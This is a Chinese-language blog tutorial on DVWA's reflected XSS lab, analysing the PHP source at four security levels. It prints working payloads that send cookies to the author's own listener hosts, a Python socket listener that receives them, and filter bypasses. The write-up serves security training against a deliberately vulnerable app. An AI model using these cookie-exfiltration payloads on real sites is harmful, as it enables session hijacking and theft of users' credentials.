dvwa靶场Reflected Cross Site Scripting (XSS)(跨站脚本攻击)全难度教程(附代码分析)

已于 2024-05-19 16:36:21 修改
阅读量365 收藏 4
点赞数 8
分类专栏: dvwa 文章标签: xss 前端 web安全
于 2024-05-18 10:49:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73248913/article/details/139021067
版权

xss简介

作为一种HTML注入攻击,XSS攻击的核心思想就是在HTML页面中注入恶意代码,代码语言是js。一般有三个角色参与:攻击者、目标服务器、受害者的浏览器。

Reflected Cross Site Scripting (XSS)(Security Level: low) 

代码分析


<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

没有任何过滤直接payload就可以

漏洞利用

poc

<script>alert(1)</script>

拿cookie

<script>alert(document.cookie)</script>

需要将此转到本机上

python脚本

import socket

HOST = '本机IP地址'#我本机就是192.168.21.180
PORT = 2022
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind((HOST, PORT))
server_socket.listen(1)
print('等待客户端连接...')

client_socket, addr = server_socket.accept()
print('客户端已连接:', addr)

data = client_socket.recv(1024)
print('接收到数据:', data.decode())
client_socket.sendall(data)
client_socket.close()
server_socket.close()

<img src="http://192.168.21.180:2022/1.php?url="+encodeURIComponent(document.location.href)+"&cookie="+encodeURIComponent(document.cookie)" />

Reflected Cross Site Scripting (XSS)(Security Level: medium)

代码分析

vulnerabilities/xss_r/source/medium.php

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello {$name}</pre>";
}

?>

查看源代码,发现对script有一个替换,但是,没有过滤大小写。大小写绕过即可

漏洞利用

http://192.168.21.128/dvwa/vulnerabilities/xss_r/?name=%3Cs%3Cscript%3Ecript%3Edocument.write%28%27%3Cimg+src%3D%22http%3A%2F%2F192.168.21.1%3A2022%2F%27%2Bdocument.cookie%2B%27%22%2F%3E%27%29%3C%2Fscript%3E#

Reflected Cross Site Scripting (XSS)(Security Level: high)

代码分析

vulnerabilities/xss_r/source/high.php

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello {$name}</pre>";
}

?>

只是警用了script但是可以使用别的

漏洞利用

http://192.168.21.128/dvwa/vulnerabilities/xss_r/
?name=%3Cimg+src+%3D+1+onerror+%3D+alert%281%29%3E#

Reflected Cross Site Scripting (XSS)(Security Level: impossible)

代码分析

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello {$name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

直接转成实体了没有一点办法

himobrinehacken
关注
  • 8
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DVWA靶场XSS(DOM/Reflected/Stored)/XSS+CSRF
m0_51150495的博客
06-15 2017
xss(dom/reflected/stored) xss+csrf
dvwa靶场,里面也有xss靶场
09-24
这个靶场模拟了各种常见的Web应用漏洞,包括XSS跨站脚本攻击)、SQL注入、文件包含等,帮助用户了解如何识别和修复这些安全问题。 1. **XSS跨站脚本攻击靶场** XSS攻击是指攻击者通过在网页中插入恶意脚本,...
XSS基础——xsslabs通关挑战
weixin_53284312的博客
02-18 3071
xss基础——xsslabs 闯关
XSS详解(概念+靶场演示)反射型与存储型的比较与详细操作
热门推荐
Hala
05-04 1万+
目录 XSS跨站脚本攻击) 1.XSS简介 1.1什么是XSS? 1.2 XSS攻击的危害包括: 2. 分类 2.1反射型 2.2存储型 3. 构造XSS脚本 3.1常用HTML标签 3.2常用javascript方法 4.反射型(四种安全级别演示) 4.4.1低安全级别 4.4.2 中安全级别 4.4.2 高安全级别 4.4.2 不可能安全级别 5.存储型(四种...
XSS详细讲解
liuqinhou的博客
06-06 4677
XSS蠕虫主要发生在用户之间存在交互行为的页面中,当Web应用程序对用户输入的数据信息没有做严格的过滤时,通过结合Ajax的异步提交,就可以实现在植入恶意代码的同时,将恶意代码进行对外发送,即实现了代码的感染和传播,也就形成了XSS蠕虫。转义" &quto;即转义掉双引号,'转义掉单引号,(另一个要注意的是实际上html的属性可以不包括引号,因此严格的说我们还需要对空格进行转义,但是这样会导致渲染的时候空格数不对,因此我们不转义空格,然后再写html属性的时候部带上引号)这样属性就不会被提前关闭了。
dvwa靶场xss
m0_63314341的博客
02-26 256
dom类型 我们先说一下low级别 low级别没有做任何防御所以我们修改url为 <​http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=Englishscript%3Ealert(/xss/)%3C/script%3Ej 即可
DVWA靶场 XSS
Lee_yc的博客
09-13 1448
1、正常注入是肯定不行了,直接查看源代码,发现只能从name字段注入,而且不能使用标签,这时就想着使用 等标签。5、也可以使用双写script标签的方法,绕过限制 alert("xss success!")") 双写标签绕过。3、大写标签进行绕过,alert("xss success!
DVWA靶场-XSS跨站脚本攻击
zeroone的博客
03-12 1463
第十关:XSS跨站脚本攻击)       XSS称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行。 反射型XSS Low <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET
DVWA靶场XSS详解
Reset
05-11 841
目录 反射型 low medium high impossible 存储型 low medium high impossible DOM型 low medium high impossible 反射型 low 服务器代码: <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET..
web安全技术-实验七、跨站脚本攻击xss)(反射型).doc
08-20
跨站脚本攻击XSS)概述】 XSS称Cross Site Scripting,是一种常见的Web应用程序安全漏洞,攻击者利用此漏洞向网页中注入恶意脚本,当其他用户浏览该页面时,这些脚本会被执行,从而可能窃取用户的敏感信息...
跨站攻击(XSS+CSRF).docx
01-05
XSS(Cross Site Scripting)攻击是指攻击者通过在网页中插入恶意脚本,使得用户在不知情的情况下执行这些脚本,从而达到窃取用户信息、操纵用户行为等目的。XSS攻击主要分为三种类型: 1. 反射型XSS:这类攻击通常...
第一节 XSS跨站脚本分类-01
09-15
XSS 跨站脚本攻击(Cross Site Scripting)是一种常见的 Web 应用程序安全漏洞。攻击者可以通过在 Web 页面中插入恶意 Script 代码来攻击用户。XSS 攻击的原理是,当用户浏览包含恶意 Script 代码Web 页面时,该 ...
kali2021.3安装dvwa靶场
02-24
标题中的“kali2021.3安装dvwa靶场”是指在Kali Linux 2021.3版本中安装DVWA(Damn Vulnerable Web Application)的过程,这是一个广泛用于Web安全学习和实践的模拟靶场。描述中提到,这个教程是为刚接触Kali的爱好...
DVWA靶场通关(XSS
m0_56010012的博客
03-22 9089
XSS漏洞 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,缩写:CSS)混淆,所以架构跨站脚本攻击缩写为XSSXSS就是攻击者在web页面插入恶意的Script代码,当用户浏览该页面时,嵌入其中的js代码会被执行,从而达到恶意攻击的目的。某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚
DVWA靶场系列(六)—— XSS跨站脚本攻击
qq_45612828的博客
08-02 2611
DVWA靶场系列(六)—— XSS跨站脚本攻击
dvwa靶场xss通关
最新发布
qq_40102160的博客
02-28 1179
基于phpStudy以及dvwa靶场,进行xss攻击实验,进行三种模式下的xss攻击,并介绍相关原理以及突破方式和防御措施。
pikachu靶场dvwa靶场xss攻击
西电卢本伟的博客
04-01 2078
xss攻击,pikachu靶场dvwa靶场
DVWA靶场中的xss-反射型xss、存储型xss的low、medium、high的详细通关方法
qq_59020256的博客
12-27 1350
alert(1)尝试闭合,输入">alert(1)输入">alert(1)输入">alert(1)输入alert(1)输入alert(1)输入alert(1)输入alert(1)
dvwa靶场xss攻击
09-25
DVWA靶场是一个用于学习和测试网络安全漏洞的虚拟环境。在DVWA靶场中,有一个特定的漏洞被称为XSS跨站脚本攻击)。XSS攻击是一种利用网页应用程序对用户输入的处理不当而进行的攻击。通过在受害者浏览器中执行恶意脚本,攻击者可以窃取用户的敏感信息、劫持用户会话或者操纵网页内容。 在DVWA靶场中,有两种XSS攻击方式:存储型XSS和反射型XSS。存储型XSS攻击是指攻击者将恶意代码嵌入到后台服务器的存储区域,当其他用户访问这个页面时,恶意代码就会被执行。而反射型XSS攻击是通过欺骗用户点击一个包含恶意代码的链接来实现攻击。 要在DVWA靶场中进行XSS攻击,可以按照以下步骤进行: 1. 首先,需要确定XSS漏洞的存在,可以通过尝试在输入框中插入一些特殊字符或标签,如<script>标签,来判断是否能成功执行恶意代码。 2. 如果成功执行了恶意代码,可以尝试构造payload来获取用户的cookie等敏感信息。 3. 进一步,可以尝试利用XSS漏洞来进行会话劫持或者篡改网页内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值